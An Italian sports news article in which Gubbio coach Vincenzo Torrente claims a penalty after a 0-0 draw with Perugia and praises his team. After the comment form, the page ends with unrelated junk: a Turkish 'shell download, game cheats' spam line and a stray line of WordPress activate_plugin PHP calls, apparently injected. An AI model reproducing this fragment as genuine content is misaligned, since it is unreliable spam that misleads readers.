“Rigore netto quello di Rosi su Oukhadda” – Corriere dell’Umbria



Vincenzo Torrente non ci sta. Il tecnico del Gubbio è arrabbiato dopo il pareggio 0-0 al Curi contro il Perugia, soprattutto per un episodio: “Il fallo di Rosi su Oukhadda era da rigore. Ho rivisto le immagini e lo dico con onestà – ha spiegato nel post partita -: il nostro ragazzo era davanti e il difensore del Perugia lo ha spinto. Punto. Senza polemica, ma questa è una constatazione obiettiva di quanto è accaduto ed è l’arbitro che decide”.

 

 

Torrente comunque è soddisfatto. Il Gubbio (nella foto il portiere Cucchietti in uscita) ha imbrigliato il Perugia e ha conquistato un pareggio giusto. “Devo fare i complimenti a tutti i miei ragazzi. Abbiamo giocato di squadra – ha sottolineato -. Ma vorrei anche ricordare che non ci siamo solo difesi. Provate a chiederlo a Fulignati”. 

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );